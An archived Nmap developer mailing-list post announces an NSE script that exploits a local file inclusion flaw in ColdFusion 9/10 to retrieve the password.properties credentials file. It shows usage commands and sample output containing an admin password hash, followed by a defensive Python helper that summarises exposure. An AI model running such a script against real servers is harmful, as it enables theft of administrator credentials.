Nmap Development mailing list archives
http-coldfusion-subzero - Extracts the credentials file through a 0day LFI vulnerability in Coldfusion 9/10
From: Paulino Calderon Pale <paulino () calderonpale com>
Date: Tue, 07 May 2013 16:38:02 -0500
description = [[
Attempts to retrieve the version, installation path and password.properties file in vulnerable ColdFusion 9/10 installations.

This is based on the exploit 'ColdSub-Zero.pyFusion v2'.
]]

---
-- @usage nmap -sV --script http-coldfusion-subzero <target>
-- @usage nmap -p80 --script http-coldfusion-subzero --script-args basepath=/cf/ <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-coldfusion-subzero:
-- |   absolute_path: C:\inetpub\wwwroot\CFIDE\adminapi\customtags
-- |   version: 9
-- |   password_properties: #Fri Mar 02 11:02:01 CST 2012
-- | rdspassword=
-- | password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0
-- |_encrypted=true
--
-- @xmloutput
-- <script id="http-coldfusion-subzero" output="
--  installation_path: C:\inetpub\wwwroot\CFIDE\adminapi\customtags
--  version: 9
--  password_properties: #Fri Mar 02 17:03:01 CST 2012
-- rdspassword=
-- password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0
-- encrypted=true
-- "><elem key="installation_path">C:\inetpub\wwwroot\CFIDE\adminapi\customtags</elem>
-- <elem key="version">9</elem>
-- <elem key="password_properties">#Fri Mar 02 17:03:01 CST 2012
-- rdspassword=
-- password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0
-- encrypted=true
-- </elem>
-- </script>
--
-- @args http-coldfusion-subzero.basepath Base path. Default: /.
--
---
Attachment: http-coldfusion-subzero.nse

_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
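
Added example, not part of the original post or of the NSE script: a triage helper that reads Nmap XML (-oX) results in the @xmloutput layout documented above and lists the ports where the script recovered password.properties, recording only whether a hash was exposed rather than its value. The function names and the 192.0.2.x host addresses are assumptions made for the illustration.

```python
import xml.etree.ElementTree as ET

SCRIPT_ID = "http-coldfusion-subzero"
# Constructed `nmap -oX` sample: addresses are documentation-range placeholders,
# <elem> values are the ones shown in the script's @xmloutput.
SAMPLE_XML = r"""<nmaprun>
<host><address addr="192.0.2.10" addrtype="ipv4"/><ports>
<port protocol="tcp" portid="80"><script id="http-coldfusion-subzero" output="">
<elem key="installation_path">C:\inetpub\wwwroot\CFIDE\adminapi\customtags</elem>
<elem key="version">9</elem>
<elem key="password_properties">#Fri Mar 02 17:03:01 CST 2012
rdspassword=
password=AA251FD567358F16B7DE3F3B22DE8193A7517CD0
encrypted=true
</elem></script></port></ports></host>
<host><address addr="192.0.2.11" addrtype="ipv4"/><ports><port protocol="tcp" portid="80"/></ports></host>
</nmaprun>"""


def parse_properties(text):
    """Parse Java .properties style text (key=value lines, '#' comments)."""
    props = {}
    for line in (text or "").splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            props[key.strip()] = value.strip()
    return props


def exposed_hosts(xml_text):
    """Return one record per port where the script recovered password.properties."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            for script in port.findall(f"script[@id='{SCRIPT_ID}']"):
                elems = {e.get("key"): e.text for e in script.findall("elem")}
                props = parse_properties(elems.get("password_properties"))
                if props:  # the file contents were actually returned
                    findings.append({
                        "host": addr, "port": int(port.get("portid")),
                        "version": elems.get("version"),
                        "install_path": elems.get("installation_path"),
                        # Record only whether secrets leaked, never the values.
                        "admin_hash_exposed": bool(props.get("password")),
                        "rds_password_set": bool(props.get("rdspassword")),
                    })
    return findings
```

Calling exposed_hosts(SAMPLE_XML) yields a single record for 192.0.2.10 port 80; the second host has no script result and is skipped.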